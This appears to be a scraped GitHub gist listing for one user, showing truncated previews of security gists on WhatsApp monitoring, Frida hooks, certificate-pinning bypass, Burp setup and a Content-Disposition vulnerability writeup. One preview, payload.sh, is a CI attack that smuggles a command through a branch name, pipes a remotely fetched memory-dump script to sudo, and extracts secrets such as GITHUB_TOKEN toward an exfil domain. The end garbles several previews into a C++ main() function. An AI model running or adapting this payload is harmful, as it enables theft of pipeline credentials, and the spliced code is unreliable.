AkshayJainG

## Environment_for_Monitoring_WhatsApp.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                AkshayJainG
                / Environment_for_Monitoring_WhatsApp.md
            
            
              Created
              August 10, 2024 06:01
                — forked from alexeinazarov/Environment_for_Monitoring_WhatsApp.md
            
              
                Environment Installation Guide for Monitoring WhatsApp Activities
              
          
    Comprehensive Environment Installation Guide for Monitoring WhatsApp Activities

This guide provides a detailed setup process for students to monitor various activities within WhatsApp, including audio, video, contacts, cookies, and other data interactions. The setup involves using dynamic instrumentation tools like Frida, filesystem monitoring tools like inotifywait, and network traffic monitoring tools like mitmproxy and Wireshark.
Prerequisites


A Linux host machine
Android Studio or Genymotion for Android emulation
Rooted Android emulator for advanced monitoring (optional)
Basic knowledge of Android development and Linux command-line tools


## keystore_spy.js
/*  Android Keystore calls detection script
    by Maurizio Siddu

    Run with:
    frida -U -f [APP_ID] -l keystore_spy.js --no-pause
*/

setTimeout(function() {
    Java.perform(function() {
        console.log('')

## payload.sh
# Replace with Burp collaborator domain or similar.
YOUR_EXFIL="https://your-exfil-domain.com"

# Deliver via branch name: 'Hacked”;{curl,-sSfL,gist.githubusercontent.com/YourUser/Hash/raw/payload.sh}${IFS}|${IFS}bash'

# Uses memory dump technique from github.com/nikitastupin/pwnhub / with regex to parse out all secret values (including GITHUB_TOKEN)
if [[ "$OSTYPE" == "linux-gnu" ]]; then
  B64_BLOB=`curl -sSf https://gist.githubusercontent.com/nikitastupin/30e525b776c409e03c2d6f328f254965/raw/memdump.py | sudo python3 | tr -d '\0' | grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' | sort -u | base64 -w 0 | base64 -w 0`
  # Print to run log
  echo $B64_BLOB

## lack_escape_content-disposition_filename.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                AkshayJainG
                / lack_escape_content-disposition_filename.md
            
            
              Created
              September 28, 2023 16:07
                — forked from motoyasu-saburi/lack_escape_content-disposition_filename.md
            
              
                Land Mine named "Content-Disposition > filename"
              
          
    TL;DR


I found 1 browser, 1 language, and 15 vulnerabilities in { Web Framework, HTTP Client library, Email library / Web Service, etc }
All the vulnerabilities I found were found from a single perspective (I investigated maybe 50-80 products).
The RFC description of the problem (rather confusingly) describes the requirements for this problem, while the WHATWG > HTML Spec is well documented.
The problem is clearly targeted at the Content-Disposition fields filename and filename*.
This problem affects HTTP Request/Response/Email in different ways.

HTTP Request : request tampering (especially with file contents, tainting of other fields, etc.)
HTTP Response : Reflect File Download vulnerability


Email : Attachment tampering (e.g., extension and filename tampering and potential file content tampering)


## gist:2971fb673aa707464beca6ddf20fbaa9
javascript:(function(){var
scripts=document.getElementsByTagName("script"),regex=/(?<=(\"|\%27|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\%60))/g;const
results=new Set;for(var i=0;i<scripts.length;i++){var
t=scripts[i].src;""!=t&&fetch(t).then(function(t){return
t.text()}).then(function(t){var e=t.matchAll(regex);for(let r of
e)results.add(r[0])}).catch(function(t){console.log("An error occurred:
",t)})}var
pageContent=document.documentElement.outerHTML,matches=pageContent.matchAll(regex);for(const
match of matches)results.add(match[0]);function
writeResults(){results.forEach(function(t){document.write(t+"<br>")})}setTimeout(writeResults,3e3);})();

## android12burp.md

      
              1 file
            
          
              1 fork
            
          
              0 comments
            
          
              0 stars
            
          
                AkshayJainG
                / android12burp.md
            
            
              Created
              September 25, 2022 15:57
                — forked from TobiasS1402/android12burp.md
            
              
                Android 12 BurpSuite intercepting
              
          
    generating certificate

My android 12 does not accept the default burp certificate, you have to generate a unique certificate. Then import this into burp and use the commands to make it compatible with Android.
mkdir cert && cd cert
openssl req -x509 -days 730 -nodes -newkey rsa:2048 -outform der -keyout server.key -out ca.der -extensions v3_ca #generate ca
openssl rsa -in server.key -inform pem -out server.key.der -outform der #convert
openssl pkcs8 -topk8 -in server.key.der -inform der -out server.key.pkcs8.der -outform der -nocrypt #convert to pkcs8

openssl x509 -inform der -in ca.der -out ca.pem
cp ca.pem `openssl x509 -inform pem -subject_hash_old -in ca.pem | head -1`.0 #create a filename with the hash


## ios14-certificate-pinning-bypass.md

      
              1 file
            
          
              1 fork
            
          
              0 comments
            
          
              0 stars
            
          
                AkshayJainG
                / ios14-certificate-pinning-bypass.md
            
            
              Created
              September 25, 2022 15:57
                — forked from AkdM/ios14-certificate-pinning-bypass.md
            
              
                iOS 14 app TLS decrypt / certificate pinning bypass steps
              
          
    This is not a tutorial, just a small guide to myself but feel free to get some infos here.
Working on an iPhone 7 running iOS 14.5.1


Jailbreak an iPhone/iPad/whatever


If necessary, you'll need to bypass Jailbreak detection for some apps with tweaks like A-Bypass, Hestia, HideJB, etc.


Get the PID of the app you want to capture traffic from with frida-ps -Ua ( a is for showing running apps only, you can -U to show all running processes instead)


## DOCKER-IN-AN-HOUR.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                AkshayJainG
                / DOCKER-IN-AN-HOUR.md
            
            
              Created
              March 27, 2022 19:15
                — forked from leonjza/DOCKER-IN-AN-HOUR.md
            
              
                Docker in an hour Workshop
              
          
    docker-in-an-hour


Welcome to docker-in-an-hour! This is a "JIT" for docker, with many explanations being just enough to defend yourself. It is highly recommended that you go and at least Google some of the stuff here after doing the workshop. Read the official docs with real explanations.
toc


## bypassAntiTamper.js
/**
 *  Rodolfo 'rodnt' Tavares
 *  twitter @rodntt
 *  github rodnt
 */

if(ObjC.available) {

    const tamperLibs = [
        "Substrate",

## enc_str.cc
#include "enc_str.h"
#include <cstdio>

static_assert(next_prime<next_prime<4>> == next_prime<4> && next_prime<4> == 5, "??");

static constexpr auto j = "I love vvb2060 and she's my wife."_senc;
static constexpr auto k = ".."_senc;
static constexpr auto l = j + k;

int main() {
	/* Android Keystore calls detection script
	by Maurizio Siddu

	Run with:
	frida -U -f [APP_ID] -l keystore_spy.js --no-pause
	*/

	setTimeout(function() {
	Java.perform(function() {
	console.log('')
	# Replace with Burp collaborator domain or similar.
	YOUR_EXFIL="https://your-exfil-domain.com"

	# Deliver via branch name: 'Hacked”;{curl,-sSfL,gist.githubusercontent.com/YourUser/Hash/raw/payload.sh}${IFS}\|${IFS}bash'

	# Uses memory dump technique from github.com/nikitastupin/pwnhub / with regex to parse out all secret values (including GITHUB_TOKEN)
	if [[ "$OSTYPE" == "linux-gnu" ]]; then
	B64_BLOB=`curl -sSf https://gist.githubusercontent.com/nikitastupin/30e525b776c409e03c2d6f328f254965/raw/memdump.py \| sudo python3 \| tr -d '\0' \| grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' \| sort -u \| base64 -w 0 \| base64 -w 0`
	# Print to run log
	echo $B64_BLOB
	javascript:(function(){var
	scripts=document.getElementsByTagName("script"),regex=/(?<=(\"\|\%27\|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"\|\'\|\%60))/g;const
	results=new Set;for(var i=0;i<scripts.length;i++){var
	t=scripts[i].src;""!=t&&fetch(t).then(function(t){return
	t.text()}).then(function(t){var e=t.matchAll(regex);for(let r of
	e)results.add(r[0])}).catch(function(t){console.log("An error occurred:
	",t)})}var
	pageContent=document.documentElement.outerHTML,matches=pageContent.matchAll(regex);for(const
	match of matches)results.add(match[0]);function
	writeResults(){results.forEach(function(t){document.write(t+"<br>")})}setTimeout(writeResults,3e3);})();
	/**
	* Rodolfo 'rodnt' Tavares
	* twitter @rodntt
	* github rodnt
	*/

	if(ObjC.available) {

	const tamperLibs = [
	"Substrate",
	#include "enc_str.h"
	#include <cstdio>

	static_assert(next_prime<next_prime<4>> == next_prime<4> && next_prime<4> == 5, "??");

	static constexpr auto j = "I love vvb2060 and she's my wife."_senc;
	static constexpr auto k = ".."_senc;
	static constexpr auto l = j + k;

	int main() {